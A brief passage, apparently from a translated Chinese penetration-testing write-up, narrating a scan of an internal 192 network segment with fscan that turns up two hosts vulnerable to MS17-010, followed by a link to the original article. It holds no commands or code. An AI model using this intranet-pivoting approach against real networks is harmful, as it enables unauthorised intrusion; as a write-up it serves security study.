Intranet penetration from the third layer, the 192 segment
I scanned the 192 segment with a regular fscan and found that the 192 assets are also very fat. Then two MS17010 hosts were found. Now the relationships are sorted out, and the current environment is as follows:
Original link: https://mp.weixin.qq.com/s?__biz=MzkxNDEwMDA4Mw==mid=2247491421idx=1sn=769d715d05057112eb4ee1ebb8312e37chksm=c172c541f6054c571e482d42 83f946625f2689ec6214e9d47a61c66399ee7d2cd2a62c0de464scene=123key=f3d6282f44b990e0f2527af4db8e088f25f3e43d0abaf5f845ff52e14965e4fe188c890